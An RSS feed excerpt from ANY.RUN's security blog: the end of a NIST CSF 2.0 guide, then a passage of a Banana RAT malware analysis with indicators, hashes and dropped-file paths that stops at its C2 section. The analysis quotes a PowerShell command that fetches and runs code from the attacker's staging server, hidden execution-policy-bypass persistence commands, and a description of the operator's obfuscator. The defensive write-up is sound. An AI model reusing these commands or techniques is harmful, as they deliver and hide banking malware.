<p class="wp-block-paragraph">ANY.RUN’s strongest contribution is in the Identify, Detect, and&nbsp;Respond&nbsp;functions, where teams need current&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">threat&nbsp;intelligence</a>,&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">behavioral&nbsp;evidence</a>, and clear investigation findings. It also contributes operational evidence that can inform governance, strengthen safeguards, and support improvements after an incident.&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-341"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="7"
           data-wpID="341"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        CSF 2.0 function                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Practical priority                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Role of ANY.RUN                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Govern                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Set risk priorities, responsibilities, policies, and oversight                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Provides investigation data and team-level visibility that can inform security decisions and process reviews                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Identify                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Understand threats, exposure, and areas for improvement                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Delivers threat intelligence and behavioral context that help teams identify relevant threats and prioritize risk                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Protect                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Strengthen safeguards and reduce exposure                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Findings from analysis can inform blocking logic, specialist training, security procedures, and preventive controls                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Detect                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Analyze suspicious activity and determine whether it represents an incident                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Reveals runtime behavior, enriches alerts with threat context, and gives analysts evidence beyond the initialdetection                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Respond                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Validate, prioritize, investigate, and coordinate incidents                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Provides evidence for triage, escalation, investigation, and containment decisions                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-bold"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Recover                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Restore affected operations and apply lessons from the incident                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Contributes investigation evidence to post-incident reviews and improvements to detection and response processes                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-341'>
table#wpdtSimpleTable-341{ table-layout: fixed !important; }
table#wpdtSimpleTable-341 td, table.wpdtSimpleTable341 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">This mapping helps CISOs understand where ANY.RUN fits within the wider security architecture.&nbsp;The result is a stronger flow of evidence across identification, detection, response, and continuous improvement, without treating ANY.RUN as a replacement for the wider controls and responsibilities required by NIST CSF 2.0.&nbsp;&nbsp;</p>



<h2 class="wp-block-heading">Turning the Framework&nbsp;into&nbsp;a Working Security Program&nbsp;</h2>



<p class="wp-block-paragraph">NIST CSF 2.0 gives CISOs at US companies a practical way to connect cybersecurity activities with business and regulatory risk. Its real value comes from helping organizations identify gaps, set priorities, assign responsibility, and improve how security teams work together.</p>



<p class="wp-block-paragraph">Implementation should begin with the organization’s current state and the outcomes it needs to achieve. From there, each function contributes to the same cycle: Govern sets the direction, Identify clarifies risk, Protect reduces exposure, Detect finds suspicious activity, Respond turns evidence into action, and Recover helps restore operations and improve future readiness.</p>



<p class="wp-block-paragraph">ANY.RUN strengthens this cycle where deeper threat context and behavioral evidence are needed. By connecting interactive analysis and threat intelligence with existing security workflows, organizations can validate threats faster, make better-informed decisions, and improve their response processes over time.</p>



<p class="wp-block-paragraph">The goal is not simply to align with NIST CSF 2.0. It is to build a security program that can adapt as threats, technologies, and business priorities change.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Turn NIST CSF 2.0 priorities into faster decisions and <br>lower operational risk.  </span><br>
Strengthen security across your organization. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktoenterprise/#contact-sales" rel="noopener" target="_blank">
Strengthen Enterprise Security</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



<p class="wp-block-paragraph">ANY.RUN, a leading provider of interactive malware analysis and&nbsp;threat&nbsp;intelligence solutions, helps organizations investigate&nbsp;threats&nbsp;faster&nbsp;and make&nbsp;response decisions based on clear&nbsp;behavioral evidence.&nbsp;</p>



<p class="wp-block-paragraph">Its solutions include the&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive&nbsp;Sandbox</a>&nbsp;for enterprise-scale malware and phishing analysis, along with&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat&nbsp;Intelligence</a>&nbsp;products built on investigation data from more than 15,000 organizations. This intelligence helps security teams enrich alerts, uncover active&nbsp;threats earlier, and add relevant context to detection, investigation, and&nbsp;response workflows.&nbsp;</p>



<p class="wp-block-paragraph">ANY.RUN is <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktocomliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II attested</a>, demonstrating its commitment to strong security controls and customer data protection. For SOCs, MSSPs, and enterprise security teams, the platform helps reduce investigation uncertainty, accelerate triage, and turn&nbsp;threat&nbsp;analysis into actionable findings.&nbsp;</p>
<p>The post <a href="https://any.run/cybersecurity-blog/nist-csf-guide-for-cisos/">NIST CSF 2.0 Practical Guide: Building a Modern Security Program for Risk Management in the US Companies</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/nist-csf-guide-for-cisos/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN </title>
		<link>https://any.run/cybersecurity-blog/banana-rat-evolution-analysis/</link>
					<comments>https://any.run/cybersecurity-blog/banana-rat-evolution-analysis/#respond</comments>
		
		<dc:creator><![CDATA[Moises Cerqueira (0xOlympus)]]></dc:creator>
		<pubDate>Tue, 07 Jul 2026 14:02:31 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[malware behavior]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=21824</guid>

					<description><![CDATA[<p>Editor’s note:&#160;The analysis is authored by Moises Cerqueira,&#160;malware researcher &#38; threat hunter. You can&#160;find Moises on&#160;LinkedIn&#160;and&#160;X. This analysis started with an exposed public index on 198[.]245[.]53[.]26, discovered via Shodan. What made it interesting was not just the server exposure itself, but the fact that it lets us compare two different Banana RAT branches tied to [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/banana-rat-evolution-analysis/">Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN </a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph"><em><strong>Editor’s note:&nbsp;The analysis is authored by Moises Cerqueira,&nbsp;</strong></em><strong><em>malware researcher &amp; threat hunter. You can&nbsp;find Moises on&nbsp;<a href="https://www.linkedin.com/in/moises-cerqueira/">LinkedIn</a>&nbsp;and&nbsp;<a href="https://x.com/0x_Olympus">X</a>.</em></strong></p>



<p class="wp-block-paragraph">This analysis started with an exposed public index on 198[.]245[.]53[.]26, discovered via Shodan. What made it interesting was not just the server exposure itself, but the fact that it lets us compare two different Banana RAT branches tied to the same infrastructure.</p>



<p class="wp-block-paragraph"><strong>The older detonation, analyzed on May 25, 2026, used an ETW-themed installation path and fake Microsoft naming. The newer detonation, analyzed on June 09, 2026, moved to randomized installation identifiers, VBS-assisted persistence, and WebSocket C2 over a hashed testewin.com subdomain.</strong></p>



<p class="wp-block-paragraph">That difference is important. Instead of seeing a single sample in isolation, we can see how the malware evolved while keeping the same staging host. This gives defenders more than a one-off IOC list: it shows how the operator changed persistence, transport, and artifact naming between two live branches.</p>



<p class="wp-block-paragraph">This article focuses on three questions:</p>



<ul class="wp-block-list">
<li>What the older branch did on disk, in memory, and on the network.</li>



<li>What changed in the newer branch.</li>



<li>Which indicators remained stable across both branches.</li>
</ul>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="867" height="320" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-Older-detonation-overview.png" alt="" class="wp-image-21911" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-Older-detonation-overview.png 867w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-Older-detonation-overview-300x111.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-Older-detonation-overview-768x283.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-Older-detonation-overview-370x137.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-Older-detonation-overview-270x100.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-Older-detonation-overview-740x273.png 740w" sizes="auto, (max-width: 867px) 100vw, 867px" /><figcaption class="wp-element-caption">Older detonation overview</figcaption></figure>



<h2 class="wp-block-heading">Why This Sample Matters</h2>



<p class="wp-block-paragraph">Banana RAT is already known for targeting Brazilian financial activity, especially banking sessions and Pix-related fraud. On its own, that is not enough to justify another write-up. What makes this case worth publishing is the branch evolution visible through two detonations and one exposed server.</p>



<p class="wp-block-paragraph">The public index on 198[.]245[.]53[.]26 exposed not only stage files such as st.php, st2.txt, and msedge.txt, but also operational tooling such as servidor_completo_pool.py and ofuscador.py. This was not just a payload host &#8211; it appeared to be active delivery infrastructure with variant-generation logic on the backend.</p>



<p class="wp-block-paragraph">That creates a useful story for readers:</p>



<ul class="wp-block-list">
<li>The same staging host serves both an older and a newer branch.</li>



<li>The operator changed artifact naming and persistence style.</li>



<li>The newer payload still keeps a fallback path that overlaps with older infrastructure choices.</li>
</ul>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="624" height="608" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-Exposed-public-index-at-198.245.53.26.png" alt="" class="wp-image-21912" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-Exposed-public-index-at-198.245.53.26.png 624w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-Exposed-public-index-at-198.245.53.26-300x292.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-Exposed-public-index-at-198.245.53.26-370x361.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-Exposed-public-index-at-198.245.53.26-270x263.png 270w" sizes="auto, (max-width: 624px) 100vw, 624px" /><figcaption class="wp-element-caption">Exposed public index at 198.245.53.26</figcaption></figure>



<h2 class="wp-block-heading">Exposed Infrastructure: Payload Generator and Obfuscator</h2>



<h3 class="wp-block-heading">servidor_completo_pool.py</h3>



<p class="wp-block-paragraph">This is a FastAPI-based service that acts as a production payload distribution backend. Its most notable characteristics are: a pool-based pre-generation of payload variants, source payloads read from /var/www/html, and exposed endpoints including /proteger, /warmup, /stats, and /folders. The script includes multiple obfuscation layers with domain, path, and string transformation logic, and it explicitly protects scheduled task and registry persistence strings during transformation.</p>



<p class="wp-block-paragraph">This is consistent with a live malware builder designed to generate polymorphic payload variants on demand.</p>



<h3 class="wp-block-heading">ofuscador.py</h3>



<p class="wp-block-paragraph">This helper script converts PowerShell commands into an ASCII-character reconstruction wrapper inside a BAT launcher. It converts each character to ord(), rebuilds the command using [char[]], and executes the result with iex. The output is the kind of bat-wrapped PowerShell one-liner used as an initial lure.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="662" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/3-Obfuscator-output-character-reconstruction-wrapper-662x1024.png" alt="" class="wp-image-21914" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/3-Obfuscator-output-character-reconstruction-wrapper-662x1024.png 662w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/3-Obfuscator-output-character-reconstruction-wrapper-194x300.png 194w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/3-Obfuscator-output-character-reconstruction-wrapper-370x572.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/3-Obfuscator-output-character-reconstruction-wrapper-270x417.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/3-Obfuscator-output-character-reconstruction-wrapper.png 703w" sizes="auto, (max-width: 662px) 100vw, 662px" /><figcaption class="wp-element-caption">Obfuscator output / character-reconstruction wrapper</figcaption></figure>
</div>


<h3 class="wp-block-heading">Samples and Hashes</h3>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-337"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="6"
           data-wpID="337"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:20.92574734812%;                    padding:10px;
                    "
                    >
                                        Artifact                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:25.843780135005%;                    padding:10px;
                    "
                    >
                                        Role                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:53.230472516876%;                    padding:10px;
                    "
                    >
                                        SHA256                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Fatura-BtgPactual-22568.bat                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Older detonation entry sample                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        BC4C29BC0C84EA18311FBADC508F6F3A9D84B54A456E672C2AB34D6B42F56C0C                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        msedgeupdate.txt / msedge.txt                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Older branch full payload                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        443C0A821C214471D74B51093AB3D69BB9BEE54DED049E5ABCDA2551E4F12707                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        st.php.malw                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Stage-2 stager (newer branch)                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        E9D918FF5F7918CFF1A3A23F3945058A66B56D6DD724066414C7E1CAB95E166D                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        payload_new.php.malw                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Full PowerShell payload (newer branch)                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        D828949ADE683CF3AC6D4260F946CA33EF861035051DB07D3EE79EC75DD243B2                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        c9dba5b0552d879be654.txt                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Runtime payload extracted from host                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        D828949ADE683CF3AC6D4260F946CA33EF861035051DB07D3EE79EC75DD243B2                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-337'>
table#wpdtSimpleTable-337{ table-layout: fixed !important; }
table#wpdtSimpleTable-337 td, table.wpdtSimpleTable337 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p class="wp-block-paragraph">The matching SHA256 between payload_new.php.malw and the extracted runtime payload closes the loop between public infrastructure, sandbox telemetry, and recovered runtime artifact.</p>



<h2 class="wp-block-heading">The Older Detonation: ETW-Themed Branch</h2>



<h3 class="wp-block-heading">Staging and First Execution</h3>



<p class="wp-block-paragraph">The older detonation analyzed Fatura-BtgPactual-22568.bat (SHA256 BC4C29BC…C0C), tagged by ANY.RUN as a PowerShell-based loader. The staging chain was straightforward:</p>



<ul class="wp-block-list">
<li>GET http://198[.]245[.]53[.]26/st.txt</li>



<li>GET http://198[.]245[.]53[.]26/payload.php</li>



<li>The visible PowerShell one-liner used was:</li>
</ul>



<pre class="wp-block-code"><code>powershell "$po='http://198.245.53.26/st.txt';iex(irm $po)" </code></pre>



<p class="wp-block-paragraph">This anchors the older branch to the same host later used by the newer branch. The difference is in the second-stage naming and the final payload behavior, not in the initial staging server.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="989" height="39" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/4-Older-branch-network-requests.png" alt="" class="wp-image-21920" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/4-Older-branch-network-requests.png 989w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/4-Older-branch-network-requests-300x12.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/4-Older-branch-network-requests-768x30.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/4-Older-branch-network-requests-370x15.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/4-Older-branch-network-requests-270x11.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/4-Older-branch-network-requests-740x29.png 740w" sizes="auto, (max-width: 989px) 100vw, 989px" /><figcaption class="wp-element-caption">Older branch network requests</figcaption></figure>



<h3 class="wp-block-heading">Disk Artifacts and Persistence</h3>



<p class="wp-block-paragraph">The older branch used recognizable, static installation artifacts:</p>



<ul class="wp-block-list">
<li>C:\Users\Public\Documents\msedge.txt</li>



<li>C:\Users\admin\AppData\Roaming\Microsoft\Diagnosis\ETW\msedgeupdate.txt</li>



<li>C:\ProgramData\Microsoft\Diagnosis\ETW\msedgeupdate.txt</li>



<li>C:\Users\admin\AppData\Roaming\Microsoft\Diagnosis\ETW\launcher.exe</li>



<li>C:\ProgramData\Microsoft\Diagnosis\ETW\MicrosoftEdgeUpdateCore.exe</li>
</ul>



<p class="wp-block-paragraph">Additional artifacts included client.pid, client_debug.log, install.token, user_process.log, and process_7780.log. ANY.RUN behavior showed: hidden PowerShell execution, base64-encoded PowerShell, task-scheduler-backed execution, and attempts to relaunch through an -InstallService path.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Close detection gaps </span>with ANY.RUN.<br>
Reduce security risk and breach impact.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananaRAT&amp;utm_term=070726&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">Notable command lines:</p>



<pre class="wp-block-code"><code>"powershell.exe" -NoP -EP Bypass -W Hidden -c "$env:MSEDGE_SKIP_UAC='1'; 
 IEX (gc '...\ETW\msedgeupdate.txt' -Raw)"</code></pre>



<pre class="wp-block-code"><code>"powershell.exe" -ExecutionPolicy Bypass -Command 
 "&amp; (&#091;ScriptBlock]::Create((gc '...\msedgeupdate.txt' -Raw))) 
 -ScriptPath '...\msedgeupdate.txt' -InstallService" </code></pre>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="909" height="86" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/5-Older-branch-dropped-files.png" alt="" class="wp-image-21922" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/5-Older-branch-dropped-files.png 909w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/5-Older-branch-dropped-files-300x28.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/5-Older-branch-dropped-files-768x73.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/5-Older-branch-dropped-files-370x35.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/5-Older-branch-dropped-files-270x26.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/5-Older-branch-dropped-files-740x70.png 740w" sizes="auto, (max-width: 909px) 100vw, 909px" /><figcaption class="wp-element-caption">Older branch dropped files</figcaption></figure>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="546" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/6-MicrosoftEdgeUpdateCore.exe-configuration-1024x546.png" alt="" class="wp-image-21924" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/6-MicrosoftEdgeUpdateCore.exe-configuration-1024x546.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/6-MicrosoftEdgeUpdateCore.exe-configuration-300x160.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/6-MicrosoftEdgeUpdateCore.exe-configuration-768x410.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/6-MicrosoftEdgeUpdateCore.exe-configuration-370x197.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/6-MicrosoftEdgeUpdateCore.exe-configuration-270x144.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/6-MicrosoftEdgeUpdateCore.exe-configuration-740x395.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/6-MicrosoftEdgeUpdateCore.exe-configuration.png 1396w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">MicrosoftEdgeUpdateCore.exe configuration</figcaption></figure>



<h3 class="wp-block-heading">Older Branch C2</h3>



